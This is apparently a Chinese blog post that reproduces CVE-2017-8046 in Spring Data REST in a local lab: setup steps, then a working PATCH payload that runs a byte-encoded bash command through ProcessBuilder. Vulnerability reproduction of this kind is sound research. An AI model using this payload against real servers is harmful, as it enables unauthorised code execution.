Spring Data REST PATCH请求远程代码执行漏洞（CVE-2017-8046） 本地复现方法

 

#1背景

Spring Data REST是Spring Data项目的一部分，可以轻松地在Spring Data存储库之上构建超媒体驱动的REST Web服务。

恶意的PATCH请求使用精心构造的JSON数据提交到spring-data-rest服务可以执行任意JAVA代码  

 

#2 影响范围

 Spring Data REST versions prior to 2.5.12, 2.6.7, 3.0 RC3

可以查看spring-data-rest-webmvc jar包的版本

 

#3 漏洞本地复现

mvn 安装

 

 

cd /opt

wget http://apache.mirror.gtcomm.net/maven/maven-3/3.5.0/binaries/apache-maven-3.5.0-bin.zip

unzip apache-maven-3.5.0-bin.zip

vim ~/.bash_profile

#PATH=/opt/apache-maven-3.5.0/bin:$PATH

cd

mvn -v

 

 

 

启动web服务

wget https://github.com/spring-projects/spring-data-examples/archive/master.zip

unzip master

cd spring-data-examples-master/rest/multi-store

mvn spring-boot:run

  

 

 

添加数据

curl -X POST -i -H "Content-Type:application/json" -d '{"firstName":"Greg", "lastName":"Turnquist"}' http://localhost:8080/persons

 

 

 

远程代码执行

请求方法为PATCH，Content-Type为 application/json-patch+json

",".join(map(str, (map(ord,"whoami > /tmp/pwn.txt"))))

 

 

PATCH /persons/1 HTTP/1.1
Host: 192.168.1.108:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 325
 
[{ "op": "replace", "path": "(new  java.lang.ProcessBuilder(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,98,97,115,104}),new java.lang.String(new byte[]{45,99}), new java.lang.String(new byte[]{119,104,111,97,109,105,32,62,32,47,116,109,112,47,112,119,110,46,116,120,116}))).start().x", "value": "Zhang" }]

　　

 

 

 

 

 

 

参考

https://tech.meituan.com/Spring_Data_REST_%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E(CVE-2017-8046)_%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0.html

https://github.com/spring-projects/spring-data-examples/tree/master/rest/multi-store